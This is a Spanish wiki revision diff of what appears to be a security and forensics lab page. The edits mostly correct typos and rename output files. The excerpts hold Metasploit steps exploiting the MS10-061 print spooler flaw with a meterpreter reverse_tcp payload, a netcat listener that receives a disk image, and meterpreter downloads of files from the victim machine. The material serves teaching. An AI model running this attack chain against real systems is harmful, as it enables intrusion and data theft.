Muestra las diferencias entre dos versiones de la página.
Ambos lados, revisión anterior Revisión previa Próxima revisión | Revisión previa | ||
sad:t2:m4 [2018/12/17 14:23] José Manuel Guallar |
sad:t2:m4 [2019/01/10 14:40] (actual) José Manuel Guallar |
||
---|---|---|---|
Línea 120: | Línea 120: | ||
msfconsole | msfconsole | ||
search ms10_061 | search ms10_061 | ||
- | use exploit/windows/smb/sm10_061_spoolss | + | use exploit/windows/smb/ms10_061_spoolss |
info | info | ||
set PAYLOAD windows/meterpreter/reverse_tcp | set PAYLOAD windows/meterpreter/reverse_tcp | ||
Línea 193: | Línea 193: | ||
<code> | <code> | ||
- | tasklist > forensics_tasklist.txt | + | tasklist > forense_tasklist.txt |
- | netstat -nao > forensics_netstat.txt | + | netstat -nao > forense_netstat.txt |
- | dir > forensics_dir.txt | + | dir > forense_dir.txt |
exit | exit | ||
</code> | </code> | ||
Línea 237: | Línea 237: | ||
</code> | </code> | ||
- | Se crea un directorio llamado forense /ms10_061. Use (-p) para suprimir un error si el directorio ya existe. | + | Se crea un directorio llamado forense/ms10_061. Use (-p) para suprimir un error si el directorio ya existe. |
- | Se cambia el directorio en/forense ICS/ms10_061. | + | Se cambia el directorio en/forense /ms10_061. |
Creamos un escucha netcat (-l) en el puerto (-p) 8888 en modo detallado extremo (-vvv) redirigir (>) salida en un archivo (ms10_016.dd) | Creamos un escucha netcat (-l) en el puerto (-p) 8888 en modo detallado extremo (-vvv) redirigir (>) salida en un archivo (ms10_016.dd) | ||
Línea 285: | Línea 285: | ||
<code> | <code> | ||
pwd | pwd | ||
- | download C:\\WINDOWS\\system32\\forensics_tasklist.txt /forensics/ms10_061/ | + | download C:\\WINDOWS\\system32\\forense_tasklist.txt /forense/ms10_061/ |
- | download C:\\WINDOWS\\system32\\forensics_netstat.txt /forensics/ms10_061/ | + | download C:\\WINDOWS\\system32\\forense_netstat.txt /forense/ms10_061/ |
- | download C:\\WINDOWS\\system32\\forensics_dir.txt /forensics/ms10_061/ | + | download C:\\WINDOWS\\system32\\forense_dir.txt /forense/ms10_061/ |
- | download C:\\WINDOWS\\system32\\RvOYs3UqrJqo7a.exe /forensics/ms10_061/ | + | download C:\\WINDOWS\\system32\\RvOYs3UqrJqo7a.exe /forense/ms10_061/ |
</code> | </code> | ||